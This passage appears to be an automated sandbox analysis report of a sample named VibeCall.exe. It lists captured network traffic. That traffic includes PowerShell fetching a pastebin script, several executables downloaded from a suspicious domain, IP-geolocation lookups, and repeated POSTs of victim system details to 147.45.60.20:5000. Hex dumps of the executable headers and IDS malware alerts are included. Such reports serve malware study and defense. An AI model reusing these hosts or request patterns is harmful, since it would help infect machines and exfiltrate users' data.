37 17 b4 94 5c 12 b5 87 37 11 b4 96 5c 12 b5 0d fc d5 b5 81 5c 12 b5 4a 21 13 b4 91 5c 12 b5 4a 21 17 b4 b0 5c 12 b5 4a 21 16 b4 92 5c 12 b5 82 da 11 b4 9e 5c 12 b5 82 da 16 b4 98 5c 12 b5 82 da 17 b4 da 5c 12 b5 e1 dd 13 b4 90 5c 12 b5 93 5c 13 b5 21 5c 12 b5 17 da 17 b4 90 5c 12 b5 17 da 10 b4 92 5c 12 b5 52 69 63 68 93 5c 12 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 83 35 bc 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 da 01 00 00 d8 46 00 00 00 00 00 f0 89 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$=|\\\7\7\7\\J!\J!\J!\\\\\\!\\\Rich\PEL5g*F
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Feb 2025 16:51:02 GMTContent-Type: application/octet-streamContent-Length: 15991506Connection: keep-aliveLast-Modified: Wed, 26 Feb 2025 13:24:58 GMTETag: "67bf162a-f402d2"Cache-Control: max-age=14400CF-Cache-Status: MISSAccept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F5rSbVAFSJiVU%2ByZYx0kWZHhLgnvgsuABAwQ%2F9J1c6AmhoZOmE7O%2B%2F%2FNYGY72dPRVOfpF12EE2odprI2pf1QZGl1saJ%2F%2BeJOlCMStnRl1EW1%2BE%2FqJxJrds27osvKmXRySlq3MOibCblGfTc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9191eabfde196e26-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1636&rtt_var=818&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=88&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 3d 7c e6 93 5c 12 b5 93 5c 12 b5 93 5c 12 b5 87 37 16 b4 9f 5c 12 b5 87 37 17 b4 94 5c 12 b5 87 37 11 b4 96 5c 12 b5 0d fc d5 b5 81 5c 12 b5 4a 21 13 b4 91 5c 12 b5 4a 21 17 b4 b0 5c 12 b5 4a 21 16 b4 92 5c 12 b5 82 da 11 b4 9e 5c 12 b5 82 da 16 b4 98 5c 12 b5 82 da 17 b4 da 5c 12 b5 e1 dd 13 b4 90 5c 12 b5 93 5c 13 b5 21 5c 12 b5 17 da 17 b4 90 5c 12 b5 17 da 10 b4 92 5c 12 b5 52 69 63 68 93 5c 12 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 83 35 bc 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 da 01 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$=|\\\7\7\7\\J!\J!\J!\\\\\\!\\\Rich\PEL5g*
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Feb 2025 16:51:08 GMTContent-Type: application/octet-streamContent-Length: 16010620Connection: keep-aliveLast-Modified: Wed, 26 Feb 2025 13:31:47 GMTETag: "67bf17c3-f44d7c"Cache-Control: max-age=14400CF-Cache-Status: MISSAccept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mEFsvAdgUFEHWmbqhh6t3b0eszlT0Y0ClJnXfApn%2B5qi6d3g%2FmkGATjNbzmTrEtfGnwEGoQFmxa8dSkfxMKYk3wemn%2FLqrDLCCNpWqiH%2B20GO6UvWaWqirhk3rNTbRMGL%2FSWPSxaVtZnt%2BM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9191eae708a84408-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=5833&min_rtt=5833&rtt_var=2916&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=88&delivery_rate=0&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 3d 7c e6 93 5c 12 b5 93 5c 12 b5 93 5c 12 b5 87 37 16 b4 9f 5c 12 b5 87 37 17 b4 94 5c 12 b5 87 37 11 b4 96 5c 12 b5 0d fc d5 b5 81 5c 12 b5 4a 21 13 b4 91 5c 12 b5 4a 21 17 b4 b0 5c 12 b5 4a 21 16 b4 92 5c 12 b5 82 da 11 b4 9e 5c 12 b5 82 da 16 b4 98 5c 12 b5 82 da 17 b4 da 5c 12 b5 e1 dd 13 b4 90 5c 12 b5 93 5c 13 b5 21 5c 12 b5 17 da 17 b4 90 5c 12 b5 17 da 10 b4 92 5c 12 b5 52 69 63 68 93 5c 12 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 83 35 bc 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 da 01 00 00 46 52 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$=|\\\7\7\7\\J!\J!\J!\\\\\\!\\\Rich\PEL5g*FR
                      Source: global trafficHTTP traffic detected: GET /downloads/aisolution_vibecall_a.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET /downloads/contry_solution_vibecall_e.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET /downloads/soundsolution_vibecall_c.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
                      Source: global trafficHTTP traffic detected: POST /send HTTP/1.1Host: 147.45.60.20:5000Content-Type: application/json; charset=utf-8Content-Length: 1101Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 5c 75 32 37 30 35 20 31 20 5c 75 30 34 31 31 5c 75 30 34 33 38 5c 75 30 34 33 42 5c 75 30 34 33 34 20 5c 75 30 34 33 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 39 5c 75 30 34 33 35 5c 75 30 34 33 44 20 5c 75 32 37 30 35 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 33 30 20 5c 75 30 34 31 42 5c 75 30 34 33 30 5c 75 30 34 34 33 5c 75 30 34 33 44 5c 75 30 34 34 37 5c 75 30 34 33 35 5c 75 30 34 34 30 3a 20 56 69 62 65 43 61 6c 6c 20 5c 6e 20 5c 75 44 38 33 44 5c 75 44 45 38 30 20 5c 75 30 34 31 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 31 5c 75 30 34 33 41 3a 20 5c 75 30 34 32 33 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 34 37 5c 75 30 34 33 44 5c 75 30 34 34 42 5c 75 30 34 33 39 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 31 37 20 5c 75 30 34 31 30 5c 75 30 34 33 39 5c 75 30 34 33 46 5c 75 30 34 33 38 3a 20 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 5c 6e 5c 75 44 38 33 43 5c 75 44 46 30 45 20 5c 75 30 34 32 31 5c 75 30 34 34 32 5c 75 30 34 34 30 5c 75 30 34 33 30 5c 75 30 34 33 44 5c 75 30 34 33 30 3a 20 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 32 30 20 5c 75 30 34 32 46 5c 75 30 34 33 37 5c 75 30 34 34 42 5c 75 30 34 33 41 3a 20 45 6e 67 6c 69 73 68 20 28 53 77 69 74 7a 65 72 6c 61 6e 64 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 43 36 34 20 5c 75 30 34 31 38 5c 75 30 34 33 43 5c 75 30 34 34 46 20 5c 75 30 34 33 46 5c 75 30 34 33 45 5c 75 30 34 33 42 5c 75 30 34 34 43 5c 75 30 34 33 37 5c 75 30 34 33 45 5c 75 30 34 33 32 5c 75 30 34 33 30 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 42 5c 75 30 34 34 46 3a 20 6a 6f 6e 65 73 20 28 38 38 38 36 38 33 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 44 41 35 20 5c 75 30 34 32 31 5c 75 30 34 33 38 5c 75 30 34 34 31 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 43 5c 75 30 34 33 30 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 5c 75 44 38 33 43 5c 75 44 46 41 45 20 5c 75 30 34 31 32 5c 75 30 34 33 38 5c 75 30 34 33 34 5c 75 30 34 33 35 5c 75 30 34 33 45 5c 75 30 34 33 41 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 34 32 5c 75 30 34 33 30 3a 20 55 4f 41 39 39 33 20 5c 6e 5c 75 32 36 39 39 5c 75 46 45 30 46 20 5c 75 30 34 31 46 5c 75 30 34 34 30 5c 75 30 34 33 45 5c 75 30 34 34 36 5c 75 30 34 33 35 5c 75 30 34 34 31 5c 75 30 34 34 31 5c 75 30 34 33 45 5c 75 30 34 34 30 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 3
                      Source: global trafficHTTP traffic detected: GET /downloads/videosolution_vibecall_b.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
                      Source: global trafficHTTP traffic detected: POST /send HTTP/1.1Host: 147.45.60.20:5000Content-Type: application/json; charset=utf-8Content-Length: 1101Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 5c 75 32 37 30 35 20 32 20 5c 75 30 34 31 31 5c 75 30 34 33 38 5c 75 30 34 33 42 5c 75 30 34 33 34 20 5c 75 30 34 33 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 39 5c 75 30 34 33 35 5c 75 30 34 33 44 20 5c 75 32 37 30 35 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 33 30 20 5c 75 30 34 31 42 5c 75 30 34 33 30 5c 75 30 34 34 33 5c 75 30 34 33 44 5c 75 30 34 34 37 5c 75 30 34 33 35 5c 75 30 34 34 30 3a 20 56 69 62 65 43 61 6c 6c 20 5c 6e 20 5c 75 44 38 33 44 5c 75 44 45 38 30 20 5c 75 30 34 31 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 31 5c 75 30 34 33 41 3a 20 5c 75 30 34 32 33 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 34 37 5c 75 30 34 33 44 5c 75 30 34 34 42 5c 75 30 34 33 39 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 31 37 20 5c 75 30 34 31 30 5c 75 30 34 33 39 5c 75 30 34 33 46 5c 75 30 34 33 38 3a 20 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 5c 6e 5c 75 44 38 33 43 5c 75 44 46 30 45 20 5c 75 30 34 32 31 5c 75 30 34 34 32 5c 75 30 34 34 30 5c 75 30 34 33 30 5c 75 30 34 33 44 5c 75 30 34 33 30 3a 20 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 32 30 20 5c 75 30 34 32 46 5c 75 30 34 33 37 5c 75 30 34 34 42 5c 75 30 34 33 41 3a 20 45 6e 67 6c 69 73 68 20 28 53 77 69 74 7a 65 72 6c 61 6e 64 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 43 36 34 20 5c 75 30 34 31 38 5c 75 30 34 33 43 5c 75 30 34 34 46 20 5c 75 30 34 33 46 5c 75 30 34 33 45 5c 75 30 34 33 42 5c 75 30 34 34 43 5c 75 30 34 33 37 5c 75 30 34 33 45 5c 75 30 34 33 32 5c 75 30 34 33 30 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 42 5c 75 30 34 34 46 3a 20 6a 6f 6e 65 73 20 28 38 38 38 36 38 33 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 44 41 35 20 5c 75 30 34 32 31 5c 75 30 34 33 38 5c 75 30 34 34 31 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 43 5c 75 30 34 33 30 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 5c 75 44 38 33 43 5c 75 44 46 41 45 20 5c 75 30 34 31 32 5c 75 30 34 33 38 5c 75 30 34 33 34 5c 75 30 34 33 35 5c 75 30 34 33 45 5c 75 30 34 33 41 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 34 32 5c 75 30 34 33 30 3a 20 55 4f 41 39 39 33 20 5c 6e 5c 75 32 36 39 39 5c 75 46 45 30 46 20 5c 75 30 34 31 46 5c 75 30 34 34 30 5c 75 30 34 33 45 5c 75 30 34 34 36 5c 75 30 34 33 35 5c 75 30 34 34 31 5c 75 30 34 34 31 5c 75 30 34 33 45 5c 75 30 34 34 30 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 3
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
                      Source: global trafficHTTP traffic detected: POST /send HTTP/1.1Host: 147.45.60.20:5000Content-Type: application/json; charset=utf-8Content-Length: 1101Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 5c 75 32 37 30 35 20 33 20 5c 75 30 34 31 31 5c 75 30 34 33 38 5c 75 30 34 33 42 5c 75 30 34 33 34 20 5c 75 30 34 33 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 39 5c 75 30 34 33 35 5c 75 30 34 33 44 20 5c 75 32 37 30 35 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 33 30 20 5c 75 30 34 31 42 5c 75 30 34 33 30 5c 75 30 34 34 33 5c 75 30 34 33 44 5c 75 30 34 34 37 5c 75 30 34 33 35 5c 75 30 34 34 30 3a 20 56 69 62 65 43 61 6c 6c 20 5c 6e 20 5c 75 44 38 33 44 5c 75 44 45 38 30 20 5c 75 30 34 31 37 5c 75 30 34 33 30 5c 75 30 34 33 46 5c 75 30 34 34 33 5c 75 30 34 34 31 5c 75 30 34 33 41 3a 20 5c 75 30 34 32 33 5c 75 30 34 33 34 5c 75 30 34 33 30 5c 75 30 34 34 37 5c 75 30 34 33 44 5c 75 30 34 34 42 5c 75 30 34 33 39 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 31 37 20 5c 75 30 34 31 30 5c 75 30 34 33 39 5c 75 30 34 33 46 5c 75 30 34 33 38 3a 20 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 5c 6e 5c 75 44 38 33 43 5c 75 44 46 30 45 20 5c 75 30 34 32 31 5c 75 30 34 34 32 5c 75 30 34 34 30 5c 75 30 34 33 30 5c 75 30 34 33 44 5c 75 30 34 33 30 3a 20 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 20 5c 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 5c 75 44 38 33 44 5c 75 44 44 32 30 20 5c 75 30 34 32 46 5c 75 30 34 33 37 5c 75 30 34 34 42 5c 75 30 34 33 41 3a 20 45 6e 67 6c 69 73 68 20 28 53 77 69 74 7a 65 72 6c 61 6e 64 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 43 36 34 20 5c 75 30 34 31 38 5c 75 30 34 33 43 5c 75 30 34 34 46 20 5c 75 30 34 33 46 5c 75 30 34 33 45 5c 75 30 34 33 42 5c 75 30 34 34 43 5c 75 30 34 33 37 5c 75 30 34 33 45 5c 75 30 34 33 32 5c 75 30 34 33 30 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 42 5c 75 30 34 34 46 3a 20 6a 6f 6e 65 73 20 28 38 38 38 36 38 33 29 20 5c 6e 5c 75 44 38 33 44 5c 75 44 44 41 35 20 5c 75 30 34 32 31 5c 75 30 34 33 38 5c 75 30 34 34 31 5c 75 30 34 34 32 5c 75 30 34 33 35 5c 75 30 34 33 43 5c 75 30 34 33 30 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 5c 75 44 38 33 43 5c 75 44 46 41 45 20 5c 75 30 34 31 32 5c 75 30 34 33 38 5c 75 30 34 33 34 5c 75 30 34 33 35 5c 75 30 34 33 45 5c 75 30 34 33 41 5c 75 30 34 33 30 5c 75 30 34 34 30 5c 75 30 34 34 32 5c 75 30 34 33 30 3a 20 55 4f 41 39 39 33 20 5c 6e 5c 75 32 36 39 39 5c 75 46 45 30 46 20 5c 75 30 34 31 46 5c 75 30 34 34 30 5c 75 30 34 33 45 5c 75 30 34 34 36 5c 75 30 34 33 35 5c 75 30 34 34 31 5c 75 30 34 34 31 5c 75 30 34 33 45 5c 75 30 34 34 30 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 3
                      Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
                      Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: ip-api.com
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:58496 -> 188.114.97.3:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:58497 -> 188.114.97.3:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:58498 -> 188.114.97.3:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:58499 -> 172.67.74.152:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:58500 -> 208.95.112.1:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:58502 -> 188.114.97.3:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:58503 -> 172.67.74.152:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:58531 -> 172.67.74.152:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:58574 -> 172.67.74.152:80
                      Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 98.142.253.232:9364 -> 192.168.2.4:58788
                      Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49739 -> 104.20.3.235:443
                      Source: global trafficHTTP traffic detected: GET /raw/ySSytGm5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /dns-query HTTP/1.1Host: cloudflare-dns.comAccept: application/dns-messageHost: cloudflare-dns.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0Content-Length: 35Content-Type: application/dns-message
                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /raw/ySSytGm5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /downloads/aisolution_vibecall_a.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET /downloads/contry_solution_vibecall_e.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET /downloads/soundsolution_vibecall_c.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
                      Source: global trafficHTTP traffic detected: GET /downloads/videosolution_vibecall_b.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: pastebin.com
                      Source: global trafficDNS traffic detected: DNS query: rustaisolutionnorisk.com
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: api.help-asus.com
                      Source: unknownDoH DNS queries detected: name: api.help-asus.com
                      Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: cloudflare-dns.comAccept: application/dns-messageHost: cloudflare-dns.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0Content-Length: 35Content-Type: application/dns-message
                      Source: VibeCall.exe, 00000000.00000000.1767166805.00007FF6F517D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
                      Source: VibeCall.exe, 00000000.00000000.1767166805.00007FF6F517D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
                      Source: powershell.exe, 00000002.00000002.1975697790.000002166EBAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                      Source: VibeCall.exe, 00000000.00000003.1777427438.0000021925C5D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1777700326.0000021925C5D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1777863101.0000021925C5D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1778074837.0000021925C5D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1778140393.0000021925C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://en.w
                      Source: VibeCall.exe, 00000000.00000000.1767166805.00007FF6F517D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
                      Source: powershell.exe, 00000002.00000002.1939088949.0000021610074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1938713455.00000278B3678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1938713455.00000278B3535000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1871645420.00000278A4DA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2121544877.0000026EE0C34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000004.00000002.1871645420.00000278A4A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                      Source: powershell.exe, 0000000A.00000002.2011671405.0000026ED0DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
